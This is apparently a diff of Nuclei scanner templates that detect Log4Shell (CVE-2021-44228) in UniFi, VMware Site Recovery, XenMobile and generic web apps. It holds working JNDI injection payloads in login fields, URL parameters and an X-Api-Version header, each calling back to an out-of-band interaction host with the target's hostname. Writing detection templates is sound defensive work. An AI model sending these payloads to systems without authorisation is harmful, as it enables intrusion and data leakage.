- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word
part: location
@ -54,8 +58,14 @@ http:
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output


@ -22,6 +22,10 @@ info:
verified: "true"
tags: cve,cve2021,rce,log4j,ubnt,unifi,oast,jndi,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -31,7 +35,7 @@ http:
Origin: {{RootURL}}
Referer: {{RootURL}}/manage/account/login?redirect=%2Fmanage
{"username":"user","password":"pass","remember":"${jndi:ldap://${hostName}.{{interactsh-url}}}","strict":true}
{"username":"user","password":"pass","remember":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}","strict":true}
matchers-condition: and
matchers:
@ -43,13 +47,23 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by mp on 2022/06/03


@ -21,10 +21,14 @@ info:
verified: "true"
tags: cve,cve2021,jndi,log4j,rce,oast,vmware,siterecovery,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- method: GET
path:
- '{{BaseURL}}/dr/authentication/oauth2/oauth2login?error=%24%7Bjndi%3Aldap%3A%2F%2F%24%7BhostName%7D.{{interactsh-url}}%7D'
- '{{BaseURL}}/dr/authentication/oauth2/oauth2login?error=$%7Bjndi%3Aldap%3A%2F%2F$%7B%3A-{{rand1}}%7D$%7B%3A-{{rand2}}%7D.$%7BhostName%7D.uri.{{interactsh-url}}%7D'
matchers-condition: and
matchers:
@ -36,7 +40,7 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word
part: body
@ -48,8 +52,14 @@ http:
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output


@ -11,6 +11,10 @@ info:
shodan-query: title:"XenMobile"
tags: cve,cve2021,rce,jndi,log4j,xenmobile,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -23,7 +27,7 @@ http:
Origin: {{BaseURL}}
Referer: {{BaseURL}}/zdm/login_xdm_uc.jsp
login=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&password=admin
login=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}&password=admin
matchers-condition: and
matchers:
@ -35,7 +39,7 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word
part: body
@ -47,8 +51,14 @@ http:
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output


@ -20,12 +20,16 @@ info:
metadata:
max-request: 1
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
X-Api-Version: ${jndi:ldap://${hostName}.{{interactsh-url}}}
X-Api-Version: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xapiversion.{{interactsh-url}}}
matchers-condition: and
matchers:
@ -37,17 +41,23 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by mp on 2022/05/31
